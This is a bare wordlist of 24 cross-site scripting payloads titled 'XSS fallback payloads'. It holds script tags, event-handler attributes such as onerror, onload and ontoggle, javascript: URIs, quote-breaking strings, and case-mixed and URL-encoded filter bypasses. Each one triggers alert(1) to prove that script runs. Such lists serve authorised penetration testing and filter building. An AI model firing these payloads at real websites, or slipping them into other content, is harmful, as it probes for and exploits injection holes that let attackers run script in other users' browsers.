# XSS fallback payloads
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
"><script>alert(1)</script>
'><script>alert(1)</script>
"><img src=x onerror=alert(1)>
<body onload=alert(1)>
<iframe src=javascript:alert(1)>
<input onfocus=alert(1) autofocus>
<details open ontoggle=alert(1)>
javascript:alert(1)
';alert(1);//
";alert(1);//
\";alert(1);//
<ScRiPt>alert(1)</ScRiPt>
<%2fscript><script>alert(1)<%2fscript>
<img src=1 onerror=alert(1)>
<video src=1 onerror=alert(1)>
<audio src=1 onerror=alert(1)>
<object data=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click</a>
<math><mi xlink:href=javascript:alert(1)>X
<table background=javascript:alert(1)>
